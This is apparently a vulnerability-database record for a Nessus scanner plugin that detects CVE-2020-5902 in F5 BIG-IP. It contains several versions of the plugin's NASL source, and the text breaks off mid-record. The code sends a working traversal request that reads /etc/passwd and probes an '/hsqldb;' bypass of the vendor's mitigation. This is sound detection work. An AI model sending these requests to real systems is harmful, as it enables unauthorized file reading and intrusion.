{"id": "F5_CVE-2020-5902.NASL", "bulletinFamily": "scanner", "title": "F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)", "description": "A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\n\nNote: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.\nThis plugin also tests for the bypass of that initial mitigation.", "published": "2020-07-06T00:00:00", "modified": "2020-07-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/138140", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://support.f5.com/csp/article/K52145254"], "cvelist": ["CVE-2020-5902"], "type": "nessus", "lastseen": "2020-08-05T09:28:24", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:f5:big-ip_domain_name_system", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_analytics", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_fraud_protection_service", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_access_policy_manager"], "cvelist": ["CVE-2020-5902"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "description": "A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-07-07T09:33:16", "references": [{"idList": ["EDB-ID:48643", "EDB-ID:48642"], "type": "exploitdb"}, {"idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108"], "type": "thn"}, {"idList": ["THREATPOST:312E32AA4DC31CFD90D946BC7E36088B"], "type": "threatpost"}, {"idList": ["F5_BIGIP_SOL52145254.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:158333", "PACKETSTORM:158366"], "type": "packetstorm"}, {"idList": ["CVE-2020-5902"], "type": "cve"}, {"idList": ["QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033"], "type": "qualysblog"}, {"idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88"], "type": "talosblog"}], "rev": 2}, "score": {"modified": "2020-07-07T09:33:16", "rev": 2, "value": 6.7, "vector": "NONE"}}, "hash": "ad13b5fd389d536c28ba5e74e855c14470992ee9b8d975b4f0c0d03048ba697d", "hashmap": [{"hash": "5a9cdaa8e5d71cddd7f051f33c585af7", "key": "cvss3"}, {"hash": "b0d7461b77c10ac7786b50a838dc7a9c", "key": "pluginID"}, {"hash": "3f66a3e8ff834d12c0ebce20c67503f4", "key": "description"}, {"hash": "e0c93dcc01b783d3fa9d2e27576fe55a", "key": "published"}, {"hash": "431216fca7382fe700b0b7a3147dc9af", "key": "sourceData"}, {"hash": "35b1c7f6f0e357d99badbb359bd975ee", "key": "cvelist"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "2f1c9c581deb19fa328e34dcb352cf42", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e0c93dcc01b783d3fa9d2e27576fe55a", "key": "modified"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "c703fc707344409b82bdccfee01ee4f0", "key": "cpe"}, {"hash": "dd2d6c2d1f82de46231d07e6fb47c097", "key": "reporter"}, {"hash": "aa77a2831240884b410ad247a9550420", "key": "references"}, {"hash": "7565a9839eea867cc867ddb0c4902362", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/138140", "id": "F5_CVE-2020-5902.NASL", "lastseen": "2020-07-07T09:33:16", "modified": "2020-07-06T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "138140", "published": "2020-07-06T00:00:00", "references": ["https://support.f5.com/csp/article/K52145254"], "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138140);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/06\");\n\n script_cve_id(\"CVE-2020-5902\");\n script_xref(name:\"IAVA\", value:\"2020-A-0283\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"BIG-IP Traffic Management User Interface Remote Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K52145254\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a version reccomended in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5902\");\n\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_analytics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_fraud_protection_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bigip_web_detect.nasl\");\n script_require_keys(\"installed_sw/F5 BIG-IP web management\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp = 'F5 BIG-IP web management';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);\ninstall = get_single_install(app_name:app, port:port);\npasswd_pattern = \"root:.*:0:[01]:\";\npoc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';\nurl = build_url(qs:poc_path, port:port);\n\nres = http_send_recv3(\n method : 'GET',\n port : port,\n item : poc_path,\n exit_on_fail : TRUE\n);\n\nif (!egrep(pattern:passwd_pattern, string:res[2])) {\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n}\n\noutput = str_replace(string:res[2], find:'\\\\n', replace:'\\n');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : '/etc/passwd',\n request : make_list(http_last_sent_request()),\n output : output,\n attach_type : 'text/plain'\n);\n", "title": "F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)", "type": "nessus", "viewCount": 3}, "differentElements": ["sourceData"], "edition": 1, "lastseen": "2020-07-07T09:33:16"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:f5:big-ip_domain_name_system", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_analytics", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_fraud_protection_service", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_access_policy_manager"], "cvelist": ["CVE-2020-5902"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "description": "A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\n\nNote: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.\nThis plugin also tests for the bypass of that initial mitigation.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-07-10T09:30:35", "references": [{"idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108"], "type": "thn"}, {"idList": ["F5_BIGIP_SOL52145254.NASL"], "type": "nessus"}, {"idList": ["TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8"], "type": "trendmicroblog"}, {"idList": ["CVE-2020-5902"], "type": "cve"}, {"idList": ["PACKETSTORM:158333", "PACKETSTORM:158581", "PACKETSTORM:158366"], "type": "packetstorm"}, {"idList": ["EDB-ID:48643", "EDB-ID:48711", "EDB-ID:48642"], "type": "exploitdb"}, {"idList": ["VU:290915"], "type": "cert"}, {"idList": ["THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B"], "type": "threatpost"}, {"idList": ["QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033"], "type": "qualysblog"}, {"idList": ["MSF:EXPLOIT/LINUX/HTTP/F5_BIGIP_TMUI_RCE"], "type": "metasploit"}, {"idList": ["1337DAY-ID-34652", "1337DAY-ID-34647", "1337DAY-ID-34748", "1337DAY-ID-34646"], "type": "zdt"}, {"idList": ["E-709"], "type": "dsquare"}, {"idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88"], "type": "talosblog"}], "rev": 2}, "score": {"modified": "2020-07-10T09:30:35", "rev": 2, "value": 7.0, "vector": "NONE"}}, "hash": "e62529e5021e6b8bc252e43f71f69b6d2ef379e41bea0944787701698df7f573", "hashmap": [{"hash": "5a9cdaa8e5d71cddd7f051f33c585af7", "key": "cvss3"}, {"hash": "b0d7461b77c10ac7786b50a838dc7a9c", "key": "pluginID"}, {"hash": "e0c93dcc01b783d3fa9d2e27576fe55a", "key": "published"}, {"hash": "35b1c7f6f0e357d99badbb359bd975ee", "key": "cvelist"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "a203a02f4dea26e0957063ffe5dbc056", "key": "sourceData"}, {"hash": "2f1c9c581deb19fa328e34dcb352cf42", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e0c93dcc01b783d3fa9d2e27576fe55a", "key": "modified"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "72209483d34c832ed8976afd75e94f48", "key": "description"}, {"hash": "c703fc707344409b82bdccfee01ee4f0", "key": "cpe"}, {"hash": "dd2d6c2d1f82de46231d07e6fb47c097", "key": "reporter"}, {"hash": "aa77a2831240884b410ad247a9550420", "key": "references"}, {"hash": "7565a9839eea867cc867ddb0c4902362", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/138140", "id": "F5_CVE-2020-5902.NASL", "lastseen": "2020-07-10T09:30:35", "modified": "2020-07-06T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "138140", "published": "2020-07-06T00:00:00", "references": ["https://support.f5.com/csp/article/K52145254"], "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138140);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/09\");\n\n script_cve_id(\"CVE-2020-5902\");\n script_xref(name:\"IAVA\", value:\"2020-A-0283\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"BIG-IP Traffic Management User Interface Remote Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\n\nNote: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.\nThis plugin also tests for the bypass of that initial mitigation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K52145254\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a version recommended in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5902\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_analytics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_fraud_protection_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bigip_web_detect.nasl\");\n script_require_keys(\"installed_sw/F5 BIG-IP web management\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp = 'F5 BIG-IP web management';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);\ninstall = get_single_install(app_name:app, port:port);\npasswd_pattern = \"root:.*:0:[01]:\";\npoc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';\nbypass_path = '/hsqldb;';\n\nfile = \"/etc/passwd\";\ngeneric = FALSE;\nline_limit = 10;\n\nurl = build_url(qs:\"/\", port:port);\n\nres = http_send_recv3(\n method : 'GET',\n port : port,\n item : poc_path,\n exit_on_fail : TRUE\n);\n\nif (!egrep(pattern:passwd_pattern, string:res[2]))\n{\n\n res = http_send_recv3(\n method : 'GET',\n port : port,\n item : bypass_path,\n exit_on_fail : TRUE\n );\n\n if('HSQL Database Engine Servlet'>< res[2])\n {\n output = chomp(res[2]);\n file = NULL;\n generic = TRUE;\n line_limit = 3;\n }\n else\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n}\nelse{\n output = str_replace(string:res[2], find:'\\\\n', replace:'\\n');\n}\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n request : make_list(http_last_sent_request()),\n file : file,\n generic : generic,\n output : output,\n line_limit : line_limit,\n attach_type : 'text/plain'\n);\n", "title": "F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)", "type": "nessus", "viewCount": 37}, "differentElements": ["sourceData"], "edition": 4, "lastseen": "2020-07-10T09:30:35"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:f5:big-ip_domain_name_system", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_analytics", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_fraud_protection_service", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_access_policy_manager"], "cvelist": ["CVE-2020-5902"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "description": "A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-07-08T09:33:29", "references": [{"idList": ["EDB-ID:48643", "EDB-ID:48642"], "type": "exploitdb"}, {"idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108"], "type": "thn"}, {"idList": ["THREATPOST:312E32AA4DC31CFD90D946BC7E36088B"], "type": "threatpost"}, {"idList": ["F5_BIGIP_SOL52145254.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:158333", "PACKETSTORM:158366"], "type": "packetstorm"}, {"idList": ["CVE-2020-5902"], "type": "cve"}, {"idList": ["VU:290915"], "type": "cert"}, {"idList": ["QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033"], "type": "qualysblog"}, {"idList": ["MSF:EXPLOIT/LINUX/HTTP/F5_BIGIP_TMUI_RCE"], "type": "metasploit"}, {"idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88"], "type": "talosblog"}], "rev": 2}, "score": {"modified": "2020-07-08T09:33:29", "rev": 2, "value": 7.4, "vector": "NONE"}}, "hash": "30f5bf1d0a9f8815836c8764eaef74b108cbdbf3fb2d12a90de1d8dcb2d77188", "hashmap": [{"hash": "5a9cdaa8e5d71cddd7f051f33c585af7", "key": "cvss3"}, {"hash": "b0d7461b77c10ac7786b50a838dc7a9c", "key": "pluginID"}, {"hash": "3f66a3e8ff834d12c0ebce20c67503f4", "key": "description"}, {"hash": "e0c93dcc01b783d3fa9d2e27576fe55a", "key": "published"}, {"hash": "35b1c7f6f0e357d99badbb359bd975ee", "key": "cvelist"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "2f1c9c581deb19fa328e34dcb352cf42", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e0c93dcc01b783d3fa9d2e27576fe55a", "key": "modified"}, {"hash": "952a90685073c04def5e493b9d871bad", "key": "sourceData"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "c703fc707344409b82bdccfee01ee4f0", "key": "cpe"}, {"hash": "dd2d6c2d1f82de46231d07e6fb47c097", "key": "reporter"}, {"hash": "aa77a2831240884b410ad247a9550420", "key": "references"}, {"hash": "7565a9839eea867cc867ddb0c4902362", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/138140", "id": "F5_CVE-2020-5902.NASL", "lastseen": "2020-07-08T09:33:29", "modified": "2020-07-06T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "138140", "published": "2020-07-06T00:00:00", "references": ["https://support.f5.com/csp/article/K52145254"], "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138140);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/07\");\n\n script_cve_id(\"CVE-2020-5902\");\n script_xref(name:\"IAVA\", value:\"2020-A-0283\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"BIG-IP Traffic Management User Interface Remote Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K52145254\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a version reccomended in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5902\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_analytics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_fraud_protection_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bigip_web_detect.nasl\");\n script_require_keys(\"installed_sw/F5 BIG-IP web management\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp = 'F5 BIG-IP web management';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);\ninstall = get_single_install(app_name:app, port:port);\npasswd_pattern = \"root:.*:0:[01]:\";\npoc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';\nurl = build_url(qs:poc_path, port:port);\n\nres = http_send_recv3(\n method : 'GET',\n port : port,\n item : poc_path,\n exit_on_fail : TRUE\n);\n\nif (!egrep(pattern:passwd_pattern, string:res[2])) {\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n}\n\noutput = str_replace(string:res[2], find:'\\\\n', replace:'\\n');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : '/etc/passwd',\n request : make_list(http_last_sent_request()),\n output : output,\n attach_type : 'text/plain'\n);\n", "title": "F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)", "type": "nessus", "viewCount": 8}, "differentElements": ["description", "sourceData"], "edition": 2, "lastseen": "2020-07-08T09:33:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:f5:big-ip_domain_name_system", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_analytics", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_fraud_protection_service", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_access_policy_manager"], "cvelist": ["CVE-2020-5902"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "description": "A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\n\nNote: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.\nThis plugin also tests for the bypass of that initial mitigation.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-07-09T09:32:16", "references": [{"idList": ["EDB-ID:48643", "EDB-ID:48642"], "type": "exploitdb"}, {"idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108"], "type": "thn"}, {"idList": ["THREATPOST:312E32AA4DC31CFD90D946BC7E36088B"], "type": "threatpost"}, {"idList": ["F5_BIGIP_SOL52145254.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:158333", "PACKETSTORM:158366"], "type": "packetstorm"}, {"idList": ["CVE-2020-5902"], "type": "cve"}, {"idList": ["VU:290915"], "type": "cert"}, {"idList": ["QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033"], "type": "qualysblog"}, {"idList": ["MSF:EXPLOIT/LINUX/HTTP/F5_BIGIP_TMUI_RCE"], "type": 